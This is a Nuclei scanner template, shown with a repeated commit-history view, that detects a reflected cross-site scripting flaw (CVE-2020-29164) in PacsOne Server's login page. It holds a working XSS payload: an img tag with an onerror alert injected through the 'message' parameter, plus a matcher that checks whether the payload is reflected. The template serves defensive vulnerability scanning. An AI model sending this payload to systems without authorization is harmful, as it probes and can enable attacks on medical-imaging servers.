nuclei-templates/cves/2020/CVE-2020-29164.yaml

id: CVE-2020-29164

info:
  name: PacsOne Server XSS
  description: PacsOne Server (PACS Server In One Box) below 7.1.1 is affected by cross-site scripting (XSS).
  author: geeknik
  severity: medium
  tags: pacsone,xss,cve,cve2020

requests:
  - method: GET
    path:
      - "{{BaseURL}}/Pacs/login.php?message=%3Cimg%20src=%22%22%20onerror=%22alert(1);%22%3E1%3C/img%3E"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 301
          - 302
        negative: true

      - type: word
        words:
          - "<img src="" onerror="alert(1);">1</img>"
        part: body
Create CVE-2020-29164.yaml 2021-03-17 15:35:41 +00:00			`id: CVE-2020-29164`

			`info:`
			`name: PacsOne Server XSS`
Update CVE-2020-29164.yaml 2021-03-17 15:38:49 +00:00			`description: PacsOne Server (PACS Server In One Box) below 7.1.1 is affected by cross-site scripting (XSS).`
Create CVE-2020-29164.yaml 2021-03-17 15:35:41 +00:00			`author: geeknik`
			`severity: medium`
			`tags: pacsone,xss,cve,cve2020`

			`requests:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/Pacs/login.php?message=%3Cimg%20src=%22%22%20onerror=%22alert(1);%22%3E1%3C/img%3E"`

			`matchers-condition: and`
			`matchers:`
			`- type: status`
			`status:`
			`- 301`
			`- 302`
			`negative: true`
Create CVE-2020-29164.yaml 2021-03-17 15:39:38 +00:00
Create CVE-2020-29164.yaml 2021-03-17 15:35:41 +00:00			`- type: word`
			`words:`
			`- "<img src="" onerror="alert(1);">1</img>"`
			`part: body`